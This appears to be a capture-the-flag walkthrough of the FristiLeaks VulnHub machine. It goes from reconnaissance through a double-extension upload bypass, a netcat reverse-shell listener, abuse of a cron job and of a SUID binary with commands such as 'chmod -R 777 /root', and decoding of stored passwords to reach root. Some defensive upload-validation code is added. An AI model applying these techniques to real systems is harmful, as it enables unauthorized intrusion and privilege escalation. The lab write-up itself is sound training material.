FristiLeaks

This is the second box on my list to work through. As I mentioned earlier, this list is made up of old boxes, but they still form a good challenge when working up to the OSCP.
Recon
Starting with an nmap scan to find out which ports are open and what public-facing services are running on the system.
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods:
| Supported Methods: GET HEAD POST OPTIONS TRACE
|_ Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Port 80 is open with a web server behind it: Apache 2.2.15, and the server banner shows it is the CentOS build, so the OS is CentOS.
There are some entries in the robots.txt file, but before I investigate the website, I'm going to check the known vulnerabilities of this Apache version.
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # searchsploit apache 2.2.15
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Apache 2.2.15 mod_proxy - Reverse Proxy Security Bypass | exploits/linux/remote/36663.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Webserver
The main page of the website has some names of the hackers behind Fristileaks and in the source there is a comment:
<!-- Welcome to #Fristleaks, a quick hackme VM by @Ar0xA
Goal: get UID 0 (root) and read the special flag file.
Timeframe: should be doable in 4 hours.
-->
The 3 entries in the robots.txt file all point to the same picture, which looks like a red herring. Just to be sure I check the picture for metadata or other hidden data, but I can't find anything.
Time to run dirsearch and brute-force the website in the hope of finding more files/folders.
Nothing... very frustrating. I tried different wordlists, but all came back with the same results: only the 3 drinks. After cracking my head over it, it dawned on me that the 3 drinks were a hint and the main page was the answer. There was one drink that wasn't in any of my lists, mostly because it is a particular Dutch drink: fristi.
The result was an admin portal with some comments.
<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->
<!--
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->
There are several ways to decode this base64 comment. As it is a base64-encoded PNG file, I simply replace the existing inline picture on the site with this blob. The result is a picture with a string of letters: keKkeKKeKKeKkEkkEk
A password? But what about the username? In the comment above there is a name: eezeepz
This username combined with the password gives me access to a page with an upload possibility.
Will it let me upload anything?
Sorry, is not a valid file. Only allowed are: png,jpg,gif
Sorry, file not uploaded
So it won't let me upload a php file. Will it let me upload a file with the extension php.jpg?
Uploading, please wait
The file has been uploaded to /uploads
Yes, it will: the filter only looks at the final extension. Now to start up a listener and run the file from the browser.
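For the defensive side of this step, here is an added example (not the box's PHP code, which I don't have) that reproduces the observed filter behaviour in a naive Python check and puts a hardened validator next to it. The naive version mirrors what the upload page accepted: a file is fine as long as its last suffix is png, jpg or gif. The hardened version insists on a single extension, a plain basename, a matching image signature and a server-generated filename, so a name like shell.php.jpg never reaches the web root. The signature bytes and sample inputs are constructed for the example.

```python
"""Upload extension checks: the permissive behaviour seen on the box next to a stricter one."""
import re
import secrets

ALLOWED = {"png", "jpg", "gif"}

# Constructed: leading bytes of the three allowed image formats.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Assumption: the box's filter behaves like this, judging only the last suffix.
def naive_is_allowed(filename):
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED  # "shell.php.jpg" passes, because ".jpg" is the last suffix


def strict_is_allowed(filename):
    """Exactly one extension from the allow-list and a plain basename.

    Rejects path separators, dotfiles, double extensions and odd characters,
    so there is no second extension for a server handler to pick up on.
    """
    if "/" in filename or "\\" in filename:
        return False
    parts = filename.split(".")
    if len(parts) != 2:          # "name.ext" only: no "a.php.jpg", no ".htaccess"
        return False
    name, ext = parts
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", name):
        return False
    return ext.lower() in ALLOWED


def content_matches_extension(data, ext):
    """Check the file really starts like the image type its extension claims."""
    return any(data.startswith(sig) for sig in MAGIC.get(ext.lower(), ()))


def accept_upload(filename, data):
    """Return (accepted, stored_name). The client's name is never used on disk."""
    if not strict_is_allowed(filename):
        return False, None
    ext = filename.rsplit(".", 1)[-1].lower()
    if not content_matches_extension(data, ext):
        return False, None
    # Random server-side name keeps attacker-controlled text out of the path.
    return True, f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    for name in ("logo.jpg", "shell.php.jpg", ".htaccess", "../evil.gif"):
        print(f"{name:16} naive={naive_is_allowed(name)!s:5} strict={strict_is_allowed(name)}")
```

Checking the content as well as the name matters because a name check alone still lets a script with a correct extension through; the random stored name also removes any need to trust the client-supplied filename at all.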
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # nc -lvnp 9999
listening on [any] 9999 ...
The file can be found in /fristi/uploads/shell.php.jpg
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # nc -lvnp 9999
listening on [any] 9999 ...
connect to [192.168.50.130] from (UNKNOWN) [192.168.50.134] 47595
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
17:17:45 up 1:05, 0 users, load average: 0.00, 0.01, 0.20
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.1$
A good place to start is the www folder, to look for things I've missed.
sh-4.1$ cd /var/www
cd /var/www
sh-4.1$ ls -lah
ls -lah
total 28K
drwxr-xr-x. 6 root root 4.0K Nov 17 2015 .
drwxr-xr-x. 19 root root 4.0K Nov 19 2015 ..
drwxr-xr-x. 2 root root 4.0K Aug 24 2015 cgi-bin
drwxr-xr-x. 3 root root 4.0K Nov 17 2015 error
drwxr-xr-x. 7 root root 4.0K Nov 25 2015 html
drwxr-xr-x. 3 root root 4.0K Nov 17 2015 icons
-rw-r--r-- 1 root root 98 Nov 17 2015 notes.txt
There is a file called notes.txt:
sh-4.1$ cat notes.txt
cat notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
In the home directory of user eezeepz is a note:
sh-4.1$ cat /home/eezeepz/notes.txt
cat /home/eezeepz/notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
Ok, so I can try to use chmod to let me read more home folders. An important detail in the note is that the full path of each binary is required, so in this case I try /usr/bin/chmod.
sh-4.1$ echo "/usr/bin/chmod -R 777 /home/" > runthis
echo "/home/admin/chmod -R 777 /home/" > runthis
After a minute I check /home and it seems like it worked.
sh-4.1$ ls -lah /home
ls -lah /home
total 28K
drwxr-xr-x. 5 root root 4.0K Nov 19 2015 .
dr-xr-xr-x. 22 root root 4.0K May 27 16:11 ..
drwxrwxrwx. 2 admin admin 4.0K Nov 19 2015 admin
drwx---r-x. 5 eezeepz eezeepz 12K Nov 18 2015 eezeepz
drwx------ 2 fristigod fristigod 4.0K Nov 19 2015 fristigod
sh-4.1$ ls -lah
ls -lah
total 652K
drwxrwxrwx. 2 admin admin 4.0K Nov 19 2015 .
drwxr-xr-x. 5 root root 4.0K Nov 19 2015 ..
-rwxrwxrwx. 1 admin admin 18 Sep 22 2015 .bash_logout
-rwxrwxrwx. 1 admin admin 176 Sep 22 2015 .bash_profile
-rwxrwxrwx. 1 admin admin 124 Sep 22 2015 .bashrc
-rwxrwxrwx 1 admin admin 45K Nov 18 2015 cat
-rwxrwxrwx 1 admin admin 48K Nov 18 2015 chmod
-rwxrwxrwx 1 admin admin 737 Nov 18 2015 cronjob.py
-rwxrwxrwx 1 admin admin 21 Nov 18 2015 cryptedpass.txt
-rwxrwxrwx 1 admin admin 258 Nov 18 2015 cryptpass.py
-rwxrwxrwx 1 admin admin 89K Nov 18 2015 df
-rwxrwxrwx 1 admin admin 24K Nov 18 2015 echo
-rwxrwxrwx 1 admin admin 160K Nov 18 2015 egrep
-rwxrwxrwx 1 admin admin 160K Nov 18 2015 grep
-rwxrwxrwx 1 admin admin 84K Nov 18 2015 ps
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt
A few Python scripts and text files. Let's look at the text file from fristigod.
sh-4.1$ cat whoisyourgodnow.txt
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
Hmmm. What about the other text file?
sh-4.1$ cat cryptedpass.txt
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
It isn't base64. So let's take a look at the Python scripts.
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
# Python 2 script as found in /home/admin/cryptpass.py on the box
import base64,codecs,sys
def encodeString(str):
    # step 1: base64-encode the input
    base64string= base64.b64encode(str)
    # step 2: reverse the base64 string, step 3: rot13 the result
    return codecs.encode(base64string[::-1], 'rot13')
cryptoResult=encodeString(sys.argv[1])
print cryptoResult
It takes a string, base64-encodes it, reverses the result and finally applies rot13.
To make it readable again, I need to undo these steps in reverse order: rot13 (which is its own inverse), reverse the string, then base64-decode. For this I can use a bash one-liner.
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # echo mVGZ3O3omkJLmy2pcuTq | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev | base64 -d
thisisalsopw123
┌──[root@n0w4n]─[~/vulnhub/fristileaks]
└──╼ # echo =RFn0AKnlMHMPIzpyuTI0ITG | tr 'A-Za-z' 'N-ZA-Mn-za-m' | rev | base64 -d
LetThereBeFristi!
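The same reversal in Python 3, as an added example that is not part of the original writeup or of the box's files: encode_string re-implements the box's cryptpass.py scheme, decode_string is its inverse, and recover_passwords runs it over the two strings found in /home/admin. Nothing here is secret in the cryptographic sense; the scheme has no key, which is exactly why the two lines below undo it.

```python
"""Inverse of the box's cryptpass.py: base64 -> reverse -> rot13, undone in reverse order."""
import base64
import codecs

# The two ciphertexts found in /home/admin on the box.
CRYPTEDPASS = "mVGZ3O3omkJLmy2pcuTq"       # cryptedpass.txt
WHOISYOURGOD = "=RFn0AKnlMHMPIzpyuTI0ITG"  # whoisyourgodnow.txt


def encode_string(plaintext):
    """Python 3 port of the box's encodeString(): base64, reverse, rot13."""
    b64 = base64.b64encode(plaintext.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")


def decode_string(token):
    """Undo encode_string(): rot13 is self-inverse, then un-reverse, then base64-decode.

    Digits, '+', '/' and '=' are untouched by rot13, so the leading '=' in
    WHOISYOURGOD is just base64 padding that ended up at the front after the reverse.
    """
    b64 = codecs.encode(token, "rot13")[::-1]
    return base64.b64decode(b64).decode()


def recover_passwords():
    """Return the recovered plaintext for both files, keyed by file name."""
    return {
        "cryptedpass.txt": decode_string(CRYPTEDPASS),
        "whoisyourgodnow.txt": decode_string(WHOISYOURGOD),
    }


if __name__ == "__main__":
    for fname, value in recover_passwords().items():
        print(f"{fname}: {value}")
    # Round trip: the port must match the original scheme or the decode would be wrong.
    assert decode_string(encode_string("sanity check")) == "sanity check"
```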
Ok. Let’s see if this is a password.
sh-4.1$ python -c 'import pty;pty.spawn("/bin/sh");'
python -c 'import pty;pty.spawn("/bin/sh");'
sh-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)
bash-4.1$ cd /home
cd /home
bash-4.1$ ls
ls
admin eezeepz fristigod
bash-4.1$ cd fristigod
cd fristigod
bash-4.1$ ls -lah
ls -lah
total 20K
drwx------ 2 fristigod fristigod 4.0K Nov 19 2015 .
drwxr-xr-x. 5 root root 4.0K Nov 19 2015 ..
-rw-r--r-- 1 fristigod fristigod 18 Sep 22 2015 .bash_logout
-rw-r--r-- 1 fristigod fristigod 176 Sep 22 2015 .bash_profile
-rw-r--r-- 1 fristigod fristigod 124 Sep 22 2015 .bashrc
Nothing... but as we could see in /etc/passwd, the home folder is located in /var/fristigod.
bash-4.1$ cd /var/fristigod
cd /var/fristigod
bash-4.1$ ls -lah
ls -lah
total 16K
drwxr-x--- 3 fristigod fristigod 4.0K Nov 25 2015 .
drwxr-xr-x. 19 root root 4.0K Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 .secret_admin_stuff
bash-4.1$ cd .secret_admin_stuff
cd .secret_admin_stuff
bash-4.1$ ls -lah
ls -lah
total 16K
drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 .
drwxr-x--- 3 fristigod fristigod 4.0K Nov 25 2015 ..
-rwsr-sr-x 1 root root 7.4K Nov 25 2015 doCom
bash-4.1$ file doCom
file doCom
doCom: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
An ELF file owned by root with the SUID and SGID bits set.
bash-4.1$ ./doCom
./doCom
Nice try, but wrong user ;)
Hahaha... bummer. It checks which user runs it.
bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ sudo -u fristi ./doCom
sudo -u fristi ./doCom
Usage: ./program_name terminal_command ...
So I can run the file as the user fristi, and it takes a command as its argument.
bash-4.1$ sudo -u fristi ./doCom touch /var/fristigod/test.tmp
sudo -u fristi ./doCom touch /var/fristigod/test.tmp
bash-4.1$ ls -lah /var/fristigod
ls -lah /var/fristigod
total 16K
drwxr-x--- 3 fristigod fristigod 4.0K May 27 18:31 .
drwxr-xr-x. 19 root root 4.0K Nov 19 2015 ..
-rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history
drwxrwxr-x. 2 fristigod fristigod 4.0K Nov 25 2015 .secret_admin_stuff
-rw-r--r-- 1 root users 0 May 27 18:31 test.tmp
Nice. The file is owned by root, so the commands passed to doCom run with root privileges.
bash-4.1$ sudo -u fristi ./doCom chmod -R 777 /root
sudo -u fristi ./doCom chmod -R 777 /root
bash-4.1$ ls -lah /root
ls -lah /root
total 48K
drwxrwxrwx. 3 root root 4.0K Nov 25 2015 .
dr-xr-xr-x. 22 root root 4.0K May 27 16:11 ..
-rwxrwxrwx 1 root root 1.9K Nov 25 2015 .bash_history
-rwxrwxrwx. 1 root root 18 May 20 2009 .bash_logout
-rwxrwxrwx. 1 root root 176 May 20 2009 .bash_profile
-rwxrwxrwx. 1 root root 176 Sep 22 2004 .bashrc
drwxrwxrwx. 3 root root 4.0K Nov 25 2015 .c
-rwxrwxrwx. 1 root root 100 Sep 22 2004 .cshrc
-rwxrwxrwx. 1 root root 1.3K Nov 17 2015 .mysql_history
-rwxrwxrwx. 1 root root 129 Dec 3 2004 .tcshrc
-rwxrwxrwx. 1 root root 829 Nov 17 2015 .viminfo
-rwxrwxrwx. 1 root root 246 Nov 17 2015 fristileaks_secrets.txt
bash-4.1$ cat /root/fristileaks_secrets.txt
cat /root/fristileaks_secrets.txt
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take!
Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)
Flag: Y0u_kn0w_y0u_l0ve_fr1st1
And that was the challenge. Not too difficult and really a good one to try.